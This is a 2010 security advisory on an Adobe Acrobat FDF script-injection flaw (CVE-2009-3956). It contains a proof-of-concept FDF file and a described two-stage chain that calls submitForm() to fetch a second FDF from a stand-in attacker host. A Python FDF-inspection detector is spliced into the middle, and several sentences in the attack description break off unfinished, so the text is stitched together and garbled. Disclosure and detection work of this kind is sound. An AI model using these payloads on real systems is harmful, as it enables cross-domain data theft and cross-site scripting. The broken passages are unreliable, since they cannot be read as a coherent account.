From: stratsec Research <research_at_nospam>
Date: Thu Jan 14 2010 - 04:19:22 GMT
To: "email@example.com" <firstname.lastname@example.org>
Stratsec Security Advisory: SS-2010-001
Title: Adobe Acrobat Script Injection
Issue type: Script Injection
Affected vendor: Adobe
Affected product: Adobe Reader and Acrobat 9.2 and 8.1.7 and earlier versions.
Release date: 12/01/2010
Discovered by: Paul Theriault
Issue status: Patch available
Description
A vulnerability exists in the handling of Forms Data Format (FDF) files which
allows script to be injected into a Portable Document Format (PDF) file hosted
on any domain on the internet. Successful exploitation of this issue results in
the potential disclosure of sensitive information or other cross-domain
attacks, including cross-site scripting.
Acrobat Forms Data Format (FDF) is a mechanism designed to allow PDF
forms to be pre-populated with data. The standard process involves
loading an FDF file, which specifies the data to be loaded and also the
location of the PDF that the data should be loaded into. However, there
are several issues in this process which open avenues for attack. First,
FDF supports a "Before" and an "After" key (entries of the FDF "/JavaScript"
dictionary) which trigger script to run either before or after the FDF
data is loaded.
The context in which this script runs is not the domain where the FDF file
is located, but rather the domain of the target PDF file. By default, Acrobat
does not prevent an FDF file from loading scripts into a PDF located on
another domain.
Furthermore, the target file specification within FDF (the "/F" key) accepts a
URL, which is then fetched by Acrobat Reader.
Combining these behaviours allows an attacker to force a victim to load a PDF
from any domain, and subsequently execute script in the Acrobat scripting
engine, within the context of the target document.
This script would be able to perform any action that is possible within the
constraints of the Acrobat scripting engine - an example attack could be to
create a script which sends the contents of the PDF to a third party.
This issue can also be used to launch a cross-site scripting attack against any
domain hosting a PDF file. Normally the victim of such an attack must accept a
warning message. However, if an open redirection vulnerability exists on the
domain which is being targeted, cross-site scripting can be achieved without
this warning message.
Impact
This issue could be used by an attacker to obtain the contents of sensitive PDF
files, or to perform other attacks against the target domain. A domain which has
an open redirection and also hosts PDF files is additionally vulnerable to
cross-site scripting. In general, cross-site scripting vulnerabilities allow the
theft of credentials associated with the domain on which the bug exists.
Affected products
Adobe Reader and Acrobat 9.2 and 8.1.7 and earlier versions.
Proof of concept
The primary exploit scenario is an attacker hosting a malicious FDF file,
which initiates loading of a PDF document from the target domain, and then
injects script which will be executed as if it had been loaded from within the
target PDF's domain. A proof of concept FDF file is shown below which
executes script in a PDF document hosted on the target domain (written here
as http://target.domain/example.pdf):
%FDF-1.2
1 0 obj
<<
/FDF <<
/F (http://target.domain/example.pdf)
/JavaScript <<
/After (app.alert("Executing script inside Acrobat at "+URL);)
>>
>>
>>
endobj
trailer
<</Root 1 0 R>>
%%EOF
The "/F" key specifies the target PDF into which the FDF data is to be loaded,
and the "After" key (within the "/JavaScript" dictionary) specifies a script to
be executed after the FDF is loaded. Note that the "Before" key can also be
used to inject script.
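To show what such an FDF looks like to a parser, and what a mail gateway or web proxy could check for, here is an added Python example. It is not code from this advisory or from Adobe: it extracts the "/F" target and any "/Before" or "/After" script from an FDF, flags the case where the script would run inside a PDF fetched from a host other than the one that served the FDF, and lists URLs referenced from the injected script (which is how the two-FDF chain described further down, a submitForm() to a second attacker-hosted FDF, shows up). The two sample FDF files and the host names target.domain and attacker.domain are constructed for the example; the tokenizer only handles literal strings with one level of nested parentheses, not hex strings or indirect objects.

```python
"""Inspect an FDF file for cross-domain script injection.

Added example (not the advisory's or Adobe's code). Sample FDF data and the
hosts target.domain / attacker.domain are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# A PDF literal string "( ... )": backslash escapes and one level of balanced
# nested parentheses, enough for a URL or a short payload such as (app.alert("x");)
LITERAL = r'\((?:[^()\\]|\\.|\((?:[^()\\]|\\.)*\))*\)'
F_KEY = re.compile(r'/F\s*(' + LITERAL + ')', re.S)                # /F (url)
SCRIPT_KEY = re.compile(r'/(Before|After)\s*(' + LITERAL + ')', re.S)
URL_IN_SCRIPT = re.compile(r'https?://[^\s"\'()]+')


def unescape(literal):
    """Drop the surrounding parentheses and undo escaped parens/backslashes."""
    return re.sub(r'\\([()\\])', r'\1', literal[1:-1])


def parse_fdf(data):
    """Return {'target': /F value or None, 'scripts': {'Before'/'After': js}}."""
    if not data.startswith('%FDF-'):
        raise ValueError('not an FDF file')
    m = F_KEY.search(data)
    return {
        'target': unescape(m.group(1)) if m else None,
        'scripts': {key: unescape(lit) for key, lit in SCRIPT_KEY.findall(data)},
    }


def _host(url):
    return (urlparse(url).hostname or '').lower()


def cross_domain_script(info, served_from):
    """True when /Before or /After script would run inside a PDF loaded from
    a host other than the one the FDF itself was served from."""
    target = info['target']
    if not info['scripts'] or not target:
        return False
    if urlparse(target).scheme not in ('http', 'https'):
        return False  # relative or local path: same origin as the FDF
    return _host(target) != served_from.lower()


def foreign_script_urls(info):
    """URLs inside the injected script that point away from the target host,
    e.g. a submitForm() fetching a second, attacker-hosted FDF."""
    target_host = _host(info['target'] or '')
    return [u for js in info['scripts'].values()
            for u in URL_IN_SCRIPT.findall(js) if _host(u) != target_host]


def analyse(data, served_from):
    """Parse and flag an FDF in one call; served_from is the host that
    delivered the FDF (taken from the URL the user navigated to)."""
    info = parse_fdf(data)
    info['cross_domain_script'] = cross_domain_script(info, served_from)
    info['foreign_urls'] = foreign_script_urls(info)
    return info


# Constructed sample: the advisory's proof of concept, served from attacker.domain.
POC_FDF = """%FDF-1.2
1 0 obj
<<
/FDF <<
/F (http://target.domain/example.pdf)
/JavaScript <<
/After (app.alert("Executing script inside Acrobat at "+URL);)
>>
>>
>>
endobj
trailer
<</Root 1 0 R>>
%%EOF
"""

# Constructed sample: first stage of the two-FDF chain, which pulls a second
# FDF from the attacker's host via submitForm().
STAGE1_FDF = POC_FDF.replace(
    'app.alert("Executing script inside Acrobat at "+URL);',
    'this.submitForm("http://attacker.domain/alert.php#FDF");')

if __name__ == '__main__':
    for name, fdf in (('poc', POC_FDF), ('stage1', STAGE1_FDF)):
        print(name, analyse(fdf, 'attacker.domain'))
```

The served_from host is the one check Acrobat itself did not make by default: an FDF on attacker.domain whose /F names target.domain and which carries /Before or /After script is exactly the pattern this advisory describes, and a same-origin FDF (served_from equal to the /F host) is left alone.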
It is important to note that this script is executing inside the Acrobat
scripting engine, and so does not have access to browser session cookies.
However as the "/F" object also
browser on the target domain. However, Acrobat Reader provides a significant
mitigation for this attack, warning the user that an attack may be taking place.
This warning can be suppressed, however, if the domain hosting the PDF file has
an open redirection vulnerability. This attack requires two malicious FDF files,
as follows:
The attacker convinces the victim to navigate to a malicious FDF file located on
an attacker controlled domain (e.g. http://attacker.domain/xss.fdf). This file
has as its target a PDF located on the target domain, and injects a script that
calls this.submitForm("http://attacker.domain/alert.php#FDF") to load a second
FDF file (the "#FDF" suffix tells the viewer to treat the response as FDF).
Note that at this point the reader shows a warning as the
However, if the target domain has an open redirection vulnerability, the
attacker can use it to prevent the security warning message from being displayed
by injecting a script that calls something like:
Solution
This issue can be fixed by simply enabling "Enhanced Security" mode within
Acrobat. The vendor's response to this issue has been to enable this mode by
default in the Acrobat update released January 12, 2010.
Timeline
16/09/2009 - Vendor notified.
18/09/2009 - Vendor acknowledges receipt of advisory.
07/10/2009 - Vendor confirms issue presence, fix release date agreed as Jan 2010.
12/01/2010 - This advisory published.
CVE item: CVE-2009-3956
About Stratsec
Stratsec specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region.